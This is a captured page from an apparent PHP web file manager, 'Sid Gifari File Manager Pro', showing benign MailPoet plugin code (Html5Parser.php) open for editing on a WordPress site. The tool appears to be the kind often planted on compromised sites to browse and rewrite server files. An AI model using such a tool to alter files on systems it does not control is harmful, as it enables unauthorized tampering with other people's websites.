🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-19 20:39:21 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
thedasstores.com
/
wp-content
/
plugins
/
mailpoet
/
lib
/
Util
/
pQuery
📍 /home/therahul/thedasstores.com/wp-content/plugins/mailpoet/lib/Util/pQuery
🔄 Refresh
✏️
Editing: Html5Parser.php
Writable
<?php // phpcs:ignore SlevomatCodingStandard.TypeHints.DeclareStrictTypes.DeclareStrictTypesMissing namespace MailPoet\Util\pQuery; if (!defined('ABSPATH')) exit; use MailPoetVendor\pQuery\Html5Parser as pQueryHtml5Parser; class Html5Parser extends pQueryHtml5Parser { /** @var string|DomNode */ public $root = DomNode::class; }
💾 Save Changes
❌ Cancel